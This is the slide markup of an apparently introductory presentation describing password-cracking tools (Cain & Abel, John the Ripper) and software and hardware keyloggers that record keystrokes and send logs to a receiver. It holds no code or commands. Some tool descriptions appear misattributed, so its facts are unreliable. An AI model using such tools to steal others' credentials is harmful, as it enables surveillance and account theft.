            <a:endParaRPr kumimoji="0" lang="en-US"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kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cain&amp; Abel:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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Cain&amp; Abel is a password recovery tool for Microsoft OS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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sniffing the network, cracking encrypted passwords using </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dictionary</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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Brute-force</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and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cryptanalysis attacks</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chemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>recording VoIP conversations</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rgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>decoding scrambled passwords</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chemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>recovering wireless network keys</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endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2795432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2" name="Picture 8" descr="Description: C:\Users\kingkhan\Desktop\John Of Yogyaf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68" y="3291254"/>
            <a:ext cx="5551568" cy="3594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221198"/>
            <a:ext cx="6705600" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="28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John the Ripper:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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The program does not exploit any</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>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software vulnerabilities</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or bugs that could not be fixed with little effort. It covers security aspects/weakness, Authentication methods and </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caching mechanism</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are present in it; its main purpose is the simplified</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>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recovery of passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1"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and credentials from various sources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="F:\backup\downloads\johntheripper1_desig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5" y="30057"/>
            <a:ext cx="2519331" cy="228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67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0" y="500042"/>
            <a:ext cx="615705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74788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Hacking tools:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Key logger</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Adobe Gothic Std B" pitchFamily="34"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74788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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These are of two types:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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itchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Software key logger:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="33CC33"/>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74788" algn="l"/>
              </a:tabLs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A key logger is surveillance software (considered to be either </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software</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1474788" algn="l"/>
              </a:tabLs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or</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spyware</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that has the capability to record every</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keystroke</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you make to a</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log file, usually</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri"/>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encrypted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6715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747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descr="C:\Users\kingkhan\Desktop\keylogging.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4790209" y="-99392"/>
            <a:ext cx="4343400" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500034" y="4286256"/>
            <a:ext cx="8143932" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A key logger records </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>messages,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>e-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, and any information you type. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> file created by the key logger can then be sent to a specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>receiver  or a Gmail id.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836883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0" y="332656"/>
            <a:ext cx="4762500" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="32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Some key loggers are:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Free Key logger:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAf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It is able to log keystrokes, clipboard data, passwords and site addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2714620"/>
            <a:ext cx="4953000" cy="3293209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hardware key logger:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLs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It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a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tiny hardware which records (or logging) the keys struck on a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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keyboard, typically in a covert manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Free ghost key logger</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is a good example for hardware key logger.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1474788" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
